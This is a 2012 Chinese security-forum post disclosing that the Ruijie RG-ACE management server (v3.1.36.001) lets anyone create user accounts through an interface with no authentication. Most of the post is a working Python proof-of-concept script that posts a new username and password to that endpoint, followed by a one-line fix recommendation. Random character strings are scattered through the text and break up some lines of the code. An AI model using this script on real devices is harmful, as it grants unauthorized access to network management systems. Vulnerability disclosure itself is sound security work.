找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2198|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
. P( t( v: P/ G" m. |8 e) U; ]  Y' C# D- {7 M" z

7 H8 V4 Q6 m; U* G测试的具体版本是6 q6 a1 V" L# V% l$ \/ j
产品名称: 锐捷应用控制引擎9 H3 X2 I+ i, `
版本号: 3.1.36.001 TC
& c- o5 U: ?8 Y: A' b编译时间: 201104291730+ U  q  E0 A$ F& R. j7 C+ y

+ J# z7 X0 b6 T' f8 z3 s' h# M: a5 A( _
漏洞证明:8 X; u; o4 F+ ^

. m) [+ q/ P7 K) t4 z5 ], K* P- k1 ^( T
- C, P4 s2 G2 O2 Z; B6 z  q8 R
3 `1 c& ^4 a, G/ D  d' k( y

  `0 Y9 o$ e5 P( _4 l  D! _4 G' N# I  i( C5 d9 o
执行脚本) Q" r# W" ]* t  J2 A( Y
#! /usr/bin/env python9 M; m9 T& Q5 x( m1 ?& _9 q- Y
#coding=gbk
9 L! q1 z: J3 K% H1 |. b#RG-ACE管理服务器 V3.1.36.0012 s1 n8 ^' [. ^# W
import urllib2, urllib,cookielib$ F) }" J. A0 L% g( E& t
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
4 O, U7 |8 X. }! F/ O9 Popener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))5 f1 `% Y7 s, f9 {9 Z9 K
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]1 p1 x$ U, \0 X, x2 `; {* D5 g
post=(("event","userManager.doInsertUserInfo"),8 j; e9 t  d, J5 d& O
("useractionname","addButtonValue"),+ n9 T0 J, q. h  f# q. N* s/ J
("useropermanager","userManager"),
' C7 c, i  X' {" m) F- f( U) @("userName","t"), #######账号自己加7 \4 {" E' C, C0 [% @! D
("pwd","aaaaaa"),######密码自己加
( v+ t4 P2 U8 k  P# Y* H("trueName","ad"),
4 f$ A2 Q" d5 A! [" p: h! d$ m("email",""),
0 c! g; P5 N) u( R/ B("mobilePhone",""),, x7 l: t  d# C* P
("officePhone",""),
+ R* n! t4 {& \) a2 h8 n) e) E("addr",""),3 n. Y# j0 Q4 |: k
("submit","确定"))4 y2 n  S. @5 \# Y
urllib2.install_opener(opener)
; Z( r$ ]2 R! x9 fp=urllib2.urlopen(url, urllib.urlencode(post)).read()
' N# x& R+ g8 v, D: mprint "Done"
& O# T; J( N  ^0 t! f
7 z* \' y! Z5 ~  h登录,连接设备* E% G" C3 |! K& s
9 {4 `3 L( p4 L5 H

/ a$ ~: e! j1 _/ }& d; _; B( J. I5 _+ t) x4 B

( q8 y. J0 k5 Q  B8 k/ O# @7 G) r
默认的管理员admin权限更大点
% v+ A0 [) O; h* Y1 O
3 }- T$ X$ o9 b$ W- m6 y- h' _: X8 ?( h  S8 u- I: d% l% b# d

5 M" D& t$ C# B' R, j7 k4 W ; R* Q+ v0 h0 A% [3 C

- |9 G$ P6 @6 x* M! [$ j8 i+ f$ u; f修复方案:
  p# X' }- v6 P: d; e# f5 q0 ^3 R加强对接口的权限验证
/ i! g% K( X& m" w0 _. t# \3 w' ]+ q, z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表